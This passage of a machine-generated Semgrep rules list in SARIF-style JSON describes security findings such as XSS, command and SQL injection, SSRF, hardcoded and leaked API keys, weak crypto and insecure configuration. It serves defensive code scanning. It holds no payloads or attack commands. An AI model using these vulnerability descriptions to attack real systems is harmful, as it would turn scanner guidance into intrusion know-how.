this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"help":{"markdown":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled)\n - [https://stackoverflow.com/a/7442668](https://stackoverflow.com/a/7442668)\n","text":"Detected an element with disabled HTML escaping. If external data can reach this, this is a cross-site scripting (XSS) vulnerability. Ensure no external data can reach here, or remove 'escape=false' from this element."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","id":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","name":"java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled","properties":{"precision":"very-high","tags":["CWE-150: Improper Neutralization of Escape, Meta, or Control Sequences","LOW CONFIDENCE","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xss.jsf.autoescape-disabled.autoescape-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","id":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","name":"ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-exposed-credentials.ruby-jwt-exposed-credentials"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","id":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","name":"python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.os.tainted-os-command-stdlib-django-secure-if-array.tainted-os-command-stdlib-django-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"help":{"markdown":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html)\n","text":"Bucket $X is not set to enforce encryption-in-transit, if not explictly setting this on the bucket policy - the property \"enforceSSL\" should be set to true"},"helpUri":"https://semgrep.dev/r/typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","id":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","name":"typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.aws-cdk.security.audit.awscdk-bucket-enforcessl.aws-cdk-bucket-enforcessl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","id":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","name":"ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-uri.ruby-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","id":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","name":"python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib.tainted-os-command-stdlib"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"help":{"markdown":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded](https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded)\n","text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","id":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","name":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","properties":{"precision":"very-high","tags":["CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","id":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","name":"csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.entityframework-taint.entityframework-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SendGrid API Key detected"},"help":{"markdown":"SendGrid API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SendGrid API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","id":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","name":"generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sendgrid-api-key.detected-sendgrid-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"help":{"markdown":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected an insecure redirect in this nginx configuration. If no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect","id":"generic.nginx.security.insecure-redirect.insecure-redirect","name":"generic.nginx.security.insecure-redirect.insecure-redirect","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-redirect.insecure-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","id":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","name":"java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ssrf-deepsemgrep-format.tainted-ssrf-deepsemgrep-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","id":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","name":"csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.oracleconnectionstringbuilder-hardcoded-secret.oracleconnectionstringbuilder-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","id":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","name":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"help":{"markdown":"RSA keys should be at least 2048 bits based on NIST recommendation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","id":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","name":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"help":{"markdown":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls)\n - [https://docs.microsoft.com/en-us/azure/key-vault/general/network-security](https://docs.microsoft.com/en-us/azure/key-vault/general/network-security)\n","text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","id":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","name":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"help":{"markdown":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root)\n - [https://github.com/hadolint/hadolint/wiki/DL3002](https://github.com/hadolint/hadolint/wiki/DL3002)\n","text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"helpUri":"https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root","id":"dockerfile.security.last-user-is-root.last-user-is-root","name":"dockerfile.security.last-user-is-root.last-user-is-root","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.last-user-is-root.last-user-is-root"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"help":{"markdown":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings)\n - [https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies](https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL)\n","text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","id":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","name":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"help":{"markdown":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df](https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df)\n","text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics","id":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","name":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","properties":{"precision":"very-high","tags":["CWE-305: Authentication Bypass by Primary Weakness","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.local-biometrics.insecure-biometrics"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec)\n - [https://guides.rubyonrails.org/security.html#command-line-injection](https://guides.rubyonrails.org/security.html#command-line-injection)\n","text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec","id":"ruby.lang.security.dangerous-exec.dangerous-exec","name":"ruby.lang.security.dangerous-exec.dangerous-exec","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code 